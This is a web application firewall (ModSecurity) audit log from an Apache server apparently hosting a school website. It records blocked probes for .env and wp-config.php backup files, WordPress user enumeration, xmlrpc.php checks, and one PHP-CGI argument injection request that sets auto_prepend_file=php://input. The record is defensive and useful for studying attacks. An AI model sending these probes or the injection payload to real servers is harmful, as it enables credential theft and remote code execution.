X-Real-IP: 205.196.217.53
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 205.196.217.53
X-Forwarded-Proto: http
Connection: close
Accept: */*
--e0bf2f19-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e0bf2f19-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746077828650288 832 (- - -)
Stopwatch2: 1746077828650288 832; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0bf2f19-Z--
--302f3c00-A--
[01/May/2025:13:28:12 +0700] aBMUfCgtr0Qsi1mFAsM05AAAAI4 103.236.140.4 48518 103.236.140.4 8181
--302f3c00-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; Moto Z2 Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--302f3c00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--302f3c00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746080892846198 782 (- - -)
Stopwatch2: 1746080892846198 782; combined=349, p1=308, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--302f3c00-Z--
--5c3bf871-A--
[01/May/2025:13:51:48 +0700] aBMaBI144kZ4LAGlEgwljQAAAMQ 103.236.140.4 53902 103.236.140.4 8181
--5c3bf871-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept-Charset: utf-8
--5c3bf871-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c3bf871-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746082308338301 792 (- - -)
Stopwatch2: 1746082308338301 792; combined=309, p1=268, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c3bf871-Z--
--1c02e40f-A--
[01/May/2025:14:42:12 +0700] aBMl1Cgtr0Qsi1mFAsNMbgAAAI8 103.236.140.4 38282 103.236.140.4 8181
--1c02e40f-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 112.74.57.225
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 112.74.57.225
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--1c02e40f-C--
--1c02e40f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c02e40f-E--
--1c02e40f-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746085332931302 4232 (- - -)
Stopwatch2: 1746085332931302 4232; combined=2635, p1=450, p2=2154, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c02e40f-Z--
--5d814b79-A--
[01/May/2025:15:50:36 +0700] aBM13I144kZ4LAGlEgxq6gAAAMw 103.236.140.4 53962 103.236.140.4 8181
--5d814b79-B--
GET /wp-config.phped HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 5.255.118.183
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 5.255.118.183
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--5d814b79-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5d814b79-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089436562979 924 (- - -)
Stopwatch2: 1746089436562979 924; combined=400, p1=362, p2=0, p3=0, p4=0, p5=37, sr=135, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5d814b79-Z--
--25121833-A--
[01/May/2025:15:50:37 +0700] aBM13Y144kZ4LAGlEgxq7QAAAMM 103.236.140.4 54008 103.236.140.4 8181
--25121833-B--
GET /wp-config.php.org HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.220.101.0
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.220.101.0
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--25121833-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--25121833-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089437562953 830 (- - -)
Stopwatch2: 1746089437562953 830; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=88, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--25121833-Z--
--c84d693d-A--
[01/May/2025:15:50:38 +0700] aBM13uVeTgVPHjrSAYCQQAAAAAg 103.236.140.4 54066 103.236.140.4 8181
--c84d693d-B--
GET /wp-config.php_old2017 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 109.70.100.68
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 109.70.100.68
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--c84d693d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c84d693d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089438739490 895 (- - -)
Stopwatch2: 1746089438739490 895; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c84d693d-Z--
--0c8ba81b-A--
[01/May/2025:15:50:39 +0700] aBM134144kZ4LAGlEgxq8gAAAME 103.236.140.4 54096 103.236.140.4 8181
--0c8ba81b-B--
GET /wp-config.php_old2018 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.220.101.7
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.220.101.7
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--0c8ba81b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0c8ba81b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089439307006 902 (- - -)
Stopwatch2: 1746089439307006 902; combined=355, p1=319, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0c8ba81b-Z--
--913b0e46-A--
[01/May/2025:15:50:40 +0700] aBM14Cgtr0Qsi1mFAsN0vwAAAIw 103.236.140.4 54134 103.236.140.4 8181
--913b0e46-B--
GET /wp-config.php_old2019 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.220.101.84
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.220.101.84
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--913b0e46-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--913b0e46-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089440060054 1140 (- - -)
Stopwatch2: 1746089440060054 1140; combined=349, p1=309, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--913b0e46-Z--
--cd2d7369-A--
[01/May/2025:15:50:40 +0700] aBM14Cgtr0Qsi1mFAsN0wgAAAIY 103.236.140.4 54164 103.236.140.4 8181
--cd2d7369-B--
GET /wp-config.php_old2020 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 46.182.21.248
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 46.182.21.248
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--cd2d7369-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cd2d7369-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089440795181 849 (- - -)
Stopwatch2: 1746089440795181 849; combined=386, p1=355, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cd2d7369-Z--
--d8249778-A--
[01/May/2025:15:50:52 +0700] aBM17Cgtr0Qsi1mFAsN06wAAAIs 103.236.140.4 54684 103.236.140.4 8181
--d8249778-B--
GET /wp-config.php-bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 109.104.153.22
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 109.104.153.22
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--d8249778-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d8249778-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089452524719 607 (- - -)
Stopwatch2: 1746089452524719 607; combined=207, p1=181, p2=0, p3=0, p4=0, p5=25, sr=49, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d8249778-Z--
--6c7e1b05-A--
[01/May/2025:15:50:53 +0700] aBM17cVMAgMJpNzaVtId7gAAAEk 103.236.140.4 54754 103.236.140.4 8181
--6c7e1b05-B--
GET /wp-config.php_bk HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 193.189.100.199
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 193.189.100.199
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
--6c7e1b05-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6c7e1b05-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746089453964500 699 (- - -)
Stopwatch2: 1746089453964500 699; combined=248, p1=209, p2=0, p3=0, p4=0, p5=38, sr=59, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6c7e1b05-Z--
--a3c7b011-A--
[01/May/2025:16:00:51 +0700] aBM4Q-VeTgVPHjrSAYCSewAAABc 103.236.140.4 35844 103.236.140.4 8181
--a3c7b011-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.125.9
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.125.9
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a3c7b011-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a3c7b011-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746090051182252 3089 (- - -)
Stopwatch2: 1746090051182252 3089; combined=1318, p1=430, p2=852, p3=0, p4=0, p5=35, sr=82, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a3c7b011-Z--
--47123574-A--
[01/May/2025:16:00:53 +0700] aBM4RcVMAgMJpNzaVtIgPAAAAFg 103.236.140.4 35860 103.236.140.4 8181
--47123574-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.125.9
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.125.9
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--47123574-C--
demo.sayHello
--47123574-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47123574-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746090053969166 5343 (- - -)
Stopwatch2: 1746090053969166 5343; combined=4226, p1=526, p2=3440, p3=29, p4=34, p5=112, sr=77, sw=85, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47123574-Z--
--a5efa726-A--
[01/May/2025:16:14:35 +0700] aBM7eygtr0Qsi1mFAsN3fAAAAIM 103.236.140.4 39000 103.236.140.4 8181
--a5efa726-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.253.165.192
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.253.165.192
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a5efa726-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a5efa726-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746090875695812 2770 (- - -)
Stopwatch2: 1746090875695812 2770; combined=1279, p1=426, p2=825, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a5efa726-Z--
--36e97826-A--
[01/May/2025:16:14:39 +0700] aBM7figtr0Qsi1mFAsN3fwAAAJU 103.236.140.4 39016 103.236.140.4 8181
--36e97826-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.253.165.192
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.253.165.192
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--36e97826-C--
demo.sayHello
--36e97826-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--36e97826-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746090878998762 6991 (- - -)
Stopwatch2: 1746090878998762 6991; combined=4979, p1=648, p2=4026, p3=38, p4=53, p5=122, sr=75, sw=92, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--36e97826-Z--
--a8e9ed02-A--
[01/May/2025:16:17:53 +0700] aBM8QY144kZ4LAGlEgxutgAAANY 103.236.140.4 39762 103.236.140.4 8181
--a8e9ed02-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.249.56.5
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.249.56.5
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a8e9ed02-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a8e9ed02-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746091073247732 2113 (- - -)
Stopwatch2: 1746091073247732 2113; combined=987, p1=332, p2=633, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a8e9ed02-Z--
--e0efce74-A--
[01/May/2025:16:17:56 +0700] aBM8RI144kZ4LAGlEgxutwAAAM0 103.236.140.4 39778 103.236.140.4 8181
--e0efce74-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.249.56.5
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.249.56.5
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--e0efce74-C--
demo.sayHello
--e0efce74-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e0efce74-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746091076416492 6620 (- - -)
Stopwatch2: 1746091076416492 6620; combined=4921, p1=617, p2=4009, p3=39, p4=44, p5=121, sr=75, sw=91, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0efce74-Z--
--749b9b1f-A--
[01/May/2025:16:24:43 +0700] aBM92-VeTgVPHjrSAYCUYQAAAAk 103.236.140.4 41418 103.236.140.4 8181
--749b9b1f-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.99.61
